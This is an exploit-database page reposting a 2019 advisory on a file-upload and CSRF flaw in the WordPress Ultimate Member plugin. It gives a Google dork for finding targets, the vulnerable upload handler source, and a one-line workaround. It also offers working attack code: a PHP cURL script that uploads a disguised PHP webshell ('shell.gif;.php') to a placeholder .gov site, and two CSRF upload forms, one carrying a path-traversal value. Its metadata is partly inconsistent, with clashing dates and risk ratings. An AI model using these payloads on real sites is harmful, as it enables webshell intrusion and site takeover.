Advertisement






WordPress Ultimate-Member Plugins 2.0.38 CSRF Backdoor Access

CVE Category Price Severity
CVE-2021-24553 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-02-05
CVSS EPSS EPSSP
CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020043

Below is a copy:

WordPress Ultimate-Member Plugins 2.0.38 CSRF Backdoor Access
####################################################################

# Exploit Title : WordPress Ultimate-Member Plugins 2.0.38 CSRF Backdoor Access
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/02/2019
# Vendor Homepage : ultimatemember.com
# Software Download Link : downloads.wordpress.org/plugin/ultimate-member.2.0.38.zip
# Software Information Links : wordpress.org/plugins/ultimate-member/
# Software Vulnerable Source Codes :
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-file-upload.php
github.com/wp-plugins/ultimate-member/blob/master/core/lib/upload/um-image-upload.php
# Software Version : 1.3.21 and 2.0.38 - other previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/ultimate-member/''
# Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

WordPress Ultimate-Member Plugins 2.0.38 CSRF Shell Upload Backdoor Access Vulnerability

####################################################################

# Description about Software :
***************************
Ultimate Member is the #1 user profile & membership plugin for WordPress. 

The plugin makes it a breeze for users to sign-up and become members of your website. 

The plugin allows you to add beautiful user profiles to your site and is perfect

for creating advanced online communities and membership sites.

Lightweight and highly extendible, Ultimate Member will enable you to create almost 

any type of site where users can join and become members with absolute ease.

####################################################################

# Impact :
***********

* The software allows the attacker to upload or transfer files of dangerous types 

that can be automatically processed within the product's environment.

* This software WordPress Ultimate-Member Plugins  is prone to a vulnerability 

that lets attackers upload arbitrary files and shell because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute 

it in the context of the webserver process. 

This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Attackers can exploit this issue through a browser. 

System Compromise - Remote attackers can gain control of vulnerable systems.

####################################################################

# Remote File Upload/Shell Upload Exploit :
***************************************
/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php

# Directory File Path :
*******************

/wp-content/uploads/ultimatemember/temp/.....

/wp-content/uploads/.....

####################################################################

# Vulnerability Error :
******************* 
{"error":"A theme or plugin compatibility issue"}

# Vulnerable Source Code => [ um-image-upload.php ]
************************
<?php
$i = 0;
$dirname = dirname( __FILE__ );
do {
$dirname = dirname( $dirname );
$wp_load = "{$dirname}/wp-load.php";
}
while( ++$i < 10 && !file_exists( $wp_load ) );
require_once( $wp_load );
global $ultimatemember;
$id = $_POST['key'];
$ultimatemember->fields->set_id = $_POST['set_id'];
$ultimatemember->fields->set_mode = $_POST['set_mode'];
$ret['error'] = null;
$ret = array();
if(isset($_FILES[$id]['name'])) {
    if(!is_array($_FILES[$id]['name'])) {

$temp = $_FILES[$id]["tmp_name"];
$file = $_FILES[$id]["name"];
$file = sanitize_file_name($file);

$error = $ultimatemember->files->check_image_upload( $temp, $id );
if ( $error ){

$ret['error'] = $error;

} else {

$ret[] = $ultimatemember->files->new_image_upload_temp( $temp, $file, um_get_option('image_compression') );

}
    }

} else {
$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');
}
echo json_encode($ret);

####################################################################

# Vulnerable Source Code => [ um-file-upload.php ]
***************************

<?php
$i = 0;
$dirname = dirname( __FILE__ );
do {
$dirname = dirname( $dirname );
$wp_load = "{$dirname}/wp-load.php";
}
while( ++$i < 10 && !file_exists( $wp_load ) );
require_once( $wp_load );
global $ultimatemember;
$id = $_POST['key'];
$ultimatemember->fields->set_id = $_POST['set_id'];
$ultimatemember->fields->set_mode = $_POST['set_mode'];
$ret['error'] = null;
$ret = array();
if(isset($_FILES[$id]['name'])) {
    if(!is_array($_FILES[$id]['name'])) {

$temp = $_FILES[$id]["tmp_name"];
$file = $_FILES[$id]["name"];
$file = sanitize_file_name($file);
$extension = pathinfo($file, PATHINFO_EXTENSION);

$error = $ultimatemember->files->check_file_upload( $temp, $extension, $id );
if ( $error ){
$ret['error'] = $error;
} else {
$ret[] = $ultimatemember->files->new_file_upload_temp( $temp, $file );
$ret['icon'] = $ultimatemember->files->get_fonticon_by_ext( $extension );
$ret['icon_bg'] = $ultimatemember->files->get_fonticon_bg_by_ext( $extension );
$ret['filename'] = $file;
}
    }

} else {
$ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');
}
echo json_encode($ret);

####################################################################

# Solution :
******************

Temporary solution to this is to disable the image upload functionality, 

which can be done by adding the following lines

$ret['error'] = __('Functionality disabled');
exit(json_encode($ret));

directly below the line

function ajax_image_upload() {

in the file /includes/core/class-files.php

####################################################################

# PHP Exploiter => 
********************

<?php

$uploadfile="shell.gif;.php";

$ch = curl_init("http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",'folder'=>'/wp-content/uploads/ultimatemember/temp/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

####################################################################

# CSRF Cross Site Request Forgery Exploiter 1 :
******************************************

<form enctype="multipart/form-data"
action="http://VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

####################################################################

# CSRF Cross Site Request Forgery Exploiter 2 :
******************************************

<html>
<body>
<form enctype="multipart/form-data" action="VULNERABLESITEHERE.gov/wp-content/plugins/ultimate-member/core/lib/upload/um-file-upload.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="Successfull!" />
</form>
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.